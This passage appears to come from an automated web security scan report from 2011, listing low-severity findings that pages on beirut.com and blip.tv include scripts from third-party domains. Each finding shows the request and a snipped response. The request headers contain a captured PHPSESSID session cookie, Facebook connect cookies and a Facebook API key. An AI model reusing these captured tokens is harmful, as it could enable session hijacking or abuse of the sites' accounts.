Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.724. http://www.beirut.com/Venues/15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Venues/15

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Venues/15 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.725. http://www.beirut.com/chat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /chat

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /chat HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:12:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.726. http://www.beirut.com/twitter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /twitter

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /twitter HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:35:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.727. http://www.beirut.com/xd_receiver.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=98034c63917cb0c0c02f1b9429eaa593&extern=0&channel=http%3A%2F%2Fwww.beirut.com%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:13:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 06 Sep 2010 13:16:23 GMT
ETag: "cf006f-16e-48f97164077c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 366

<!-- saved from url=(0022)http://internet.e-mail -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<body><script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

21.728. http://www.blip.tv/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/DistributionLogoFlipper.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/HomeThumbInfo.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/HomeTwitter.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff
  • http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 27267
Date: Tue, 25 Jan 2011 13:12:57 GMT
X-Varnish: 1794566613
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
</script>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/DistributionLogoFlipper.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/HomeThumbInfo.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/HomeTwitter.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.729. http://www.blip.tv/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /about/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /about/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=about; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:12:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16917
Date: Tue, 25 Jan 2011 13:12:59 GMT
X-Varnish: 829691482
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- BEGIN Survey widget -->
<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
<!-- END Survey widget -->

<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.730. http://www.blip.tv/blogs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /blogs/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /blogs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10640
Date: Tue, 25 Jan 2011 13:13:02 GMT
X-Varnish: 496204649
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.731. http://www.blip.tv/dtd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /dtd

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /dtd HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 10622
Date: Tue, 25 Jan 2011 13:13:13 GMT
X-Varnish: 1652152037
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.732. http://www.blip.tv/dtd/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /dtd/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /dtd/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 10622
Date: Tue, 25 Jan 2011 13:13:04 GMT
X-Varnish: 809220060
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<!--format_inc_header-->
       

<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.733. http://www.blip.tv/file

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /file

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff
  • http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay
  • http://edge.quantserve.com/quant.js

Request

GET /file HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10777
Date: Tue, 25 Jan 2011 13:13:14 GMT
X-Varnish: 829692866
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
</script>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>


<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.734. http://www.blip.tv/file/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /file/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton
  • http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
  • http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay
